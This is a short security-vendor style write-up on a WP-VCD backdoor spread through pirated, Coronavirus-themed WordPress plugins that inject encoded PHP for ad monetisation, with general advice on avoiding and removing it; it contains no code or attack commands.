COVID-19 WordPress Malware

The COVID-19 WordPress Malware is a family of backdoor Trojans associated with the WP-VCD threat actor. This variant of its attacks uses corrupted plugins, themed after Coronavirus tracking utilities, for converting compromised websites into sources of revenue (such as by displaying advertisements). Website admins should avoid unsafe download sources and let appropriate anti-malware tools remove the COVID-19 WordPress Malware, and Web surfers can protect their browsers with various methods, such as script blockers.

WordPress Jumps Aboard the Plague Ship Inadvertently

The WP-VCD threat actor is joining the abusers of the CoronaVirus Ransomware, the SpyMax RAT, the Vicious Panda threat actor, and dozens – if not hundreds – of others in exploiting panic about the COVID-19 virus. WP-VCD is a group of hackers with long-since-confirmed preferences for converting random users' vulnerable WordPress sites into money-making machines, such as by using them for ad traffic. The organization's latest twist on their backdoor Trojaneering is the COVID-19 WordPress Malware, a Coronavirus-themed plugin.

The use of a pirated or 'nulled' plugin is one of this entity's favorite means of circulated their for-profit backdoor Trojans. In the case of the COVID-19 WordPress Malware, the site's owner comes across the plugin from a torrent or corrupted website, with names referencing graphs for Coronavirus spread predictions or live trackers. Whatever their names are, the plugins have corrupted elements in common: encoded PHP that it adds to every page on the site, along with additional theme hijackers. Like a more standard backdoor Trojan, the COVID-19 WordPress Malware also coordinates its attack features through contacting the WP-VCD's Command & Control server of the moment for any directives.

Malware experts see this theme as a new change in WP-VCD's social engineering kit, but the COVID-19 WordPress Malware is similar to other payloads from the threat actor. It may direct traffic to third-party websites or load pop-ups automatically, all for monetizing the interactions with a minimum of hands-on work on the part of WP-VCD.

Avoiding Plugging into Blogging Problems

The COVID-19 WordPress Malware is hardly the only Trojan that abuses the Coronavirus panic for its gain. Its hijacking WordPress for illicit traffic monetization is something that it shares with threats like BabaYaga and Clipsa. The PHP alterations of the COVID-19 WordPress Malware's attacks also are something that many Web designers and programmers could implement with little trouble, and makes illicit plugins into an almost permanent threat to WordPress site owners.

Users' first and most crucial defensive guideline is avoiding the torrents, crafted piracy-themed websites, and other resources that WP-VCD uses generously. Secondarily, they also can make sure to scan any downloads, including website plugins, before opening them or implementing any code or scripts found therein. Malware analysts note that the COVID-19 WordPress Malware has few non-aesthetic updates from the threat actor's old Trojans and should be identifiable by the usual heuristics and IoCs.

Anti-malware services with threat-detecting features for websites should remove the COVID-19 WordPress Malware cleanly from plugin-compromised domains. For users exposing themselves to WordPress sites regularly, pertinent defenses include turning off JavaScript, Flash, and Java on a domain-by-domain basis, as well as blocking advertisements and pop-ups automatically.

The COVID-19 WordPress Malware is an anything-but-shocking pivot from WP-VCD, which is benefiting from human tragedy for PHP-funneled money. Like NanoBot e-mail lures, and similar attacks, the duty of not letting panic overcome common sense falls onto every PC user.